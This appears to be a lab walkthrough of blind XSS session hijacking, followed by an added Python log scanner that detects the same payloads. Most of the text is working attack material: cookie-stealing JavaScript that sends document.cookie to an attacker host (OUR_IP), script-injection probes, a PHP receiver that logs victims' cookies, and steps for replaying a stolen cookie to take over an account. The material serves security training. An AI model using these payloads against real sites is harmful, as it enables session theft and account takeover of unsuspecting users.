Blind XSS - Session Hijacking


Blind XSS Detection

Let's run the test on the web application at /hijacking on the server at the end of this section. We see a User Registration page with multiple fields, so let's submit a test user to see how the form handles the data:

Once we submit the form, we get the following message:

Session Hijacking

A session hijacking attack is very similar to the phishing attack we performed in the previous section. It requires a JavaScript payload to send us the required data and a PHP script hosted on our server to grab and parse the transmitted data.

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

We can write any of these JavaScript payloads to script.js, which will be hosted on our VM as well:

new Image().src='http://OUR_IP/index.php?c='+document.cookie

Now, we can change the URL in the XSS payload we found earlier to use script.js (don't forget to replace OUR_IP with your VM IP in the JS script and the XSS payload):

<script src=http://OUR_IP/script.js></script>

Now, we wait for the victim to visit the vulnerable page and view our XSS payload. Once they do, we will get two requests on our server, one for script.js, which in turn will make another request with the cookie value:

10.10.10.10:52798 [200]: /script.js
10.10.10.10:52799 [200]: /index.php?c=cookie=f904f93c949d19d870911bf8b05fe7b2

We can save the following PHP script as index.php and re-run the PHP server:

<?php
// Receiver: log every cookie sent back in the "c" parameter, one line per cookie
if (isset($_GET['c'])) {
    // document.cookie separates cookies with ";", so split on it
    $list = explode(";", $_GET['c']);
    foreach ($list as $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");   // append to the log file
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

As mentioned earlier, the cookie value shows up directly in the PHP server's terminal output. Since we prepared the PHP script, we also get a cookies.txt file with a clean log of the cookies:

eldeim@htb[/htb]$ cat cookies.txt 
Victim IP: 10.10.10.1 | Cookie: cookie=f904f93c949d19d870911bf8b05fe7b2

Finally, we can use this cookie on the login.php page to access the victim's account. To do so, once we navigate to /hijacking/login.php, we can press Shift+F9 in Firefox to reveal the Storage tab in the Developer Tools. Then, we can click the + button in the top right corner and add our cookie, where the Name is the part before = and the Value is the part after = in the stolen cookie:

Summary

Test to be Performed

We set up a server and inject XSS probes into the input fields, using a different path per field (/username, /fullname) so the request that reaches our server tells us which field is vulnerable:

mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 0.0.0.0:8000
<script src="http://TU_IP:8000/username"></script>  ← put this in the 'username' field
<script src="http://TU_IP:8000/fullname"></script>  ← put this in the 'fullname' field
## Other payloads to test, from PayloadsAllTheThings:
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

There may also be a content field that accepts a URL, which could redirect to our web server.

Malicious Payload

document.location='http://OUR_IP/index.php?c='+document.cookie;
## or
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

Save this payload as script.js (for example) in /tmp/tmpserver.

Build the receiver

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Save it as index.php.

Send the XSS injection and wait

<script src="http://TU_IP:8000/script.js"></script>
## or any of the other payloads from PayloadsAllTheThings

There are multiple JavaScript payloads we can use to grab the session cookie and send it to us, as shown by PayloadsAllTheThings.
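A defender-side check, as an added example that is not part of the original page: it scans form-submission audit-log lines for the probe and cookie-exfiltration payloads listed above and extracts the hosts they would call back to. The log line format, the sample lines and the 203.0.113.5 address are constructed assumptions, not anything from the lab.

```python
import re
from urllib.parse import unquote_plus
# Indicators derived from the probe and exfiltration payloads shown on this page.
PROBE_PATTERNS = [
    ("external-script-src", re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//", re.I)),
    ("javascript-eval-loader", re.compile(r"javascript:\s*eval\(", re.I)),
    ("xhr-loader", re.compile(r"new\s+XMLHttpRequest\s*\(", re.I)),
    ("jquery-getscript", re.compile(r"\$\.getScript\s*\(", re.I)),
    ("cookie-exfil", re.compile(r"document\.cookie", re.I)),
]
# Any host the payload would call back to (script src, a.src, XHR open(), getScript()).
HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.\-]+(?::\d+)?)")
# Assumed (hypothetical) audit-log line format: "<ts> <src_ip> <field>=<url-encoded value>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<field>\w+)=(?P<value>\S*)$")

def scan_value(field, raw_value):
    """Return a finding dict if a submitted value matches a known probe, else None."""
    value = unquote_plus(raw_value)  # form values arrive URL-encoded, as with the PHP urldecode()
    hits = [name for name, rx in PROBE_PATTERNS if rx.search(value)]
    if not hits:
        return None
    return {"field": field, "indicators": hits,
            "callback_hosts": sorted(set(HOST_RE.findall(value)))}

def scan_log(lines):
    """Scan audit-log lines and return one finding per suspicious submission."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = scan_value(m["field"], m["value"])
        if finding:
            finding.update(ts=m["ts"], src_ip=m["ip"])
            findings.append(finding)
    return findings

def callback_hosts(findings):
    """Distinct hosts the probes call back to: the egress indicators worth blocking."""
    return sorted({h for f in findings for h in f["callback_hosts"]})

# Constructed sample log: two benign submissions, then probes matching this page's payloads
# (203.0.113.5 stands in for the attacker's OUR_IP / TU_IP).
SAMPLE_LOG = [
    "2024-05-01T12:00:01Z 198.51.100.7 username=alice",
    "2024-05-01T12:00:02Z 198.51.100.7 fullname=Alice+Example",
    "2024-05-01T12:01:10Z 203.0.113.5 username=%3Cscript+src%3D%22http%3A%2F%2F203.0.113.5%3A8000%2Fusername%22%3E%3C%2Fscript%3E",
    "2024-05-01T12:01:11Z 203.0.113.5 fullname=%22%3E%3Cscript+src%3Dhttp%3A%2F%2F203.0.113.5%3E%3C%2Fscript%3E",
    "2024-05-01T12:02:00Z 203.0.113.5 comment=javascript%3Aeval%28%27var+a%3Ddocument.createElement%28%5C%27script%5C%27%29%3Ba.src%3D%5C%27http%3A%2F%2F203.0.113.5%5C%27%3Bdocument.body.appendChild%28a%29%27%29",
    "2024-05-01T12:03:00Z 203.0.113.5 comment=new+Image%28%29.src%3D%27http%3A%2F%2F203.0.113.5%2Findex.php%3Fc%3D%27%2Bdocument.cookie",
]
```

Running scan_log(SAMPLE_LOG) yields four findings and callback_hosts() returns the two attacker endpoints, which is the list an egress block or proxy alert would be built from.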